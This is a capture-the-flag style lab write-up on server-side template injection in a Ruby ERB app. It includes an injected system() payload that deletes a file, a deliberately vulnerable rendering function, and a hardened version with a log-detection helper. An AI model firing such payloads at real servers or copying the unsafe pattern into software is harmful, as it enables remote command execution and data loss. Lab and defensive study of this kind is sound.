Basic server-side template injection
Description
This lab is vulnerable to server-side template injection due to the unsafe construction of an ERB template.
Reproduction and proof of concept
Notice that when you try to view more details about the first product, a GET request uses the message parameter to render “Unfortunately this product is out of stock” on the home page.
GET /?message=Unfortunately%20this%20product%20is%20out%20of%20stock HTTP/1.1
Host: 0a92004e03b924bac214204200eb00bf.web-security-academy.net
...
In the ERB documentation, discover that the syntax <%= someExpression %> is used to evaluate an expression and render the result on the page. Use ERB template syntax to create a test payload containing a mathematical operation, for example:
<%= 7*7 %>
URL-encode this payload and insert it as the value of the message parameter in the URL:
https://0a92004e03b924bac214204200eb00bf.web-security-academy.net/?message=<%25%3d+7*7+%25>
Load the URL in your browser. Notice that in place of the message, the result of your mathematical operation is rendered on the page, in this case, the number 49. This indicates that we may have a server-side template injection vulnerability.
From the Ruby documentation, discover the system() method, which can be used to execute arbitrary operating system commands. Construct a payload to delete Carlos’s file:
<%= system("rm /home/carlos/morale.txt") %>
URL-encode the payload and insert it as the value of the message parameter:
https://0a92004e03b924bac214204200eb00bf.web-security-academy.net/?message=<%25+system("rm+/home/carlos/morale.txt")+%25>
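The root cause the lab describes is that the message parameter is spliced into the ERB template source itself, so the <%= 7*7 %> probe is compiled and executed rather than displayed. The following Ruby script is an added example, not the lab's own server code or anything from PortSwigger: it reconstructs the vulnerable construction (assumed, to mirror the behaviour above), shows the hardened form where the template is a fixed string and the parameter is bound as data and HTML-escaped on output, and adds a small log-review helper that URL-decodes a query string and flags values containing an ERB tag, using the exact encoded query from the URL above.

```ruby
require 'erb'
require 'uri'

# Vulnerable pattern (constructed to mirror the lab): the request parameter
# is interpolated into the template *source*, so any ERB tags it carries are
# compiled and evaluated. With message = "<%= 7*7 %>" this returns "<p>49</p>".
def render_unsafe(message)
  ERB.new("<p>#{message}</p>").result(binding)
end

# Hardened pattern: the template source is a constant string; the parameter is
# supplied as data via result_with_hash and HTML-escaped on output, so the same
# probe is rendered literally as "&lt;%= 7*7 %&gt;" and nothing is evaluated.
SAFE_TEMPLATE = ERB.new('<p><%= ERB::Util.html_escape(message) %></p>')

def render_safe(message)
  SAFE_TEMPLATE.result_with_hash(message: message)
end

# Detection helper for access-log or WAF review: decode each query parameter
# and flag values that contain an ERB tag opener. The lab's encoded form
# "<%25%3d+7*7+%25>" decodes to "<%= 7*7 %>" and is therefore flagged.
ERB_TAG = /<%/

def template_tag_in_query?(query_string)
  URI.decode_www_form(query_string).any? { |_key, value| ERB_TAG.match?(value) }
end

if __FILE__ == $0
  probe = '<%= 7*7 %>'
  puts render_unsafe(probe)
  puts render_safe(probe)
  # Query strings taken from the two requests shown in the walkthrough.
  puts template_tag_in_query?('message=<%25%3d+7*7+%25>')
  puts template_tag_in_query?('message=Unfortunately%20this%20product%20is%20out%20of%20stock')
end
```

The fix is structural rather than a filter: once the template text can no longer be influenced by the request, there is no expression for ERB to evaluate, and html_escape additionally prevents the reflected message from becoming an XSS sink. The detection helper is only a triage aid for spotting probes in logs; it is not a substitute for the template change.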
Exploitability
An attacker will need to review the ERB documentation to find out how to execute arbitrary code, then delete the morale.txt file from Carlos’s home directory.